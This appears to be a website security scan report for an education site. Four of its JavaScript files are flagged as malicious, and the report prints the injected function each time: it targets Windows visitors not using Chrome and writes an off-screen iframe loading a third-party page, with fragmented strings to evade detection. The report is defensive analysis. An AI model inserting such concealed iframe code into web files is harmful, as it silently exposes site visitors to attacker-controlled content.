Scanned pages/files
Request | Server response | Status |
http://www.ul-ucheba.ru/ | 200 OK Content-Length: 69919 Content-Type: text/html | clean |
http://www.ul-ucheba.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 96962 Content-Type: application/javascript | clean |
http://www.ul-ucheba.ru/media/system/js/core.js | 200 OK Content-Length: 5384 Content-Type: application/javascript | clean |
http://www.ul-ucheba.ru/media/system/js/caption.js | 200 OK Content-Length: 1329 Content-Type: application/javascript | clean |
http://www.ul-ucheba.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 238931 Content-Type: application/javascript | malicious |
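Malicious code - confirmed by antiviruses (see below). The injected function reads navigator.userAgent and calls document.write only when the string contains "Windows" (past its first character) and neither "Chrome" nor "IEMobile"; what it writes is a 138x138 iframe positioned off-screen (left and top at -849px) that loads a page from a third-party host. The style attribute and the closing tag are assembled from concatenated fragments, presumably so that plain string matching on the file does not find them. The excerpt is cut off after the function, and the text that follows it appears to be the file's original library code. The same function is reported in four scripts in this scan, so each flagged file needs to be restored from a known-good copy, not only this one.
function Argisuliterkas() {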
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk Form.Validator.add("validate-currency-yuan",{errorMsg:function(){return Form.Validator.getMsg("currencyYuan");},test:function(a){return Form.Validator.getValidator("IsEmpty").test(a)||(/^ï¿¥?\-?([1-9]{1}[0-9]{0,2}(\,[0-9]{3})*(\.[0-9]{0,2})?|[1-9]{1}\d*(\.[0-9]{0,2})?|0(\.[0-9]{0,2})?|(\.[0-9]{1,2})?)$/).test(a.get("value")); }}); Antivirus reports:
| ||
http://www.ul-ucheba.ru/modules/mod_zstagcloud/js/swfobject.js | 200 OK Content-Length: 10359 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
http://www.ul-ucheba.ru/modules/mod_fpss/includes/js/jquery.fpss.js | 200 OK Content-Length: 5499 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk Antivirus reports:
| ||
http://ul-ucheba.ru/modules/mod_highlighter_gk4/interface/scripts/engine.js | 200 OK Content-Length: 6828 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk var $this = this; if($this.mouseIsOver == false) { $this.effects1[$this.actual].start('opacity', 0); $this.effects2[$this.actual].start('top', 0,-24); $this.actual++; if($this.actual > $this.items.length-1) $this.actual = 0; $this.effects1[$this.actual].start('opacity', 1); $this.effects2[$this.actual].start('top', 24,0); } } }); GKNewsHighligher.implement(new Options); Antivirus reports:
| ||
http://www.ul-ucheba.ru/index.php | 200 OK Content-Length: 69928 Content-Type: text/html | clean |
http://www.ul-ucheba.ru/news | 200 OK Content-Length: 45135 Content-Type: text/html | clean |
http://www.ul-ucheba.ru/colleges | 200 OK Content-Length: 46944 Content-Type: text/html | clean |
http://www.ul-ucheba.ru/language-courses | 200 OK Content-Length: 45199 Content-Type: text/html | clean |
http://www.ul-ucheba.ru/all-questions | 200 OK Content-Length: 48148 Content-Type: text/html | clean |
http://www.ul-ucheba.ru/law-questions | 200 OK Content-Length: 44264 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ul-ucheba.ru
Result:
GET / HTTP/1.1
Host: ul-ucheba.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ul-ucheba.ru
Referer: http://www.google.com/search?q=ul-ucheba.ru
Result:
The result is similar to the first query. No suspicious redirects were found.
GET / HTTP/1.1
Host: ul-ucheba.ru
Referer: http://www.google.com/search?q=ul-ucheba.ru
Result:
The result is similar to the first query. No suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ul-ucheba.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ul-ucheba.ru/
Result: ul-ucheba.ru is not infected or malware details are not published yet.
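Result: ul-ucheba.ru is not infected or malware details are not published yet.
This lookup does not contradict the scan above: four scripts served by the site were flagged as malicious, and a blacklist entry may simply not exist yet.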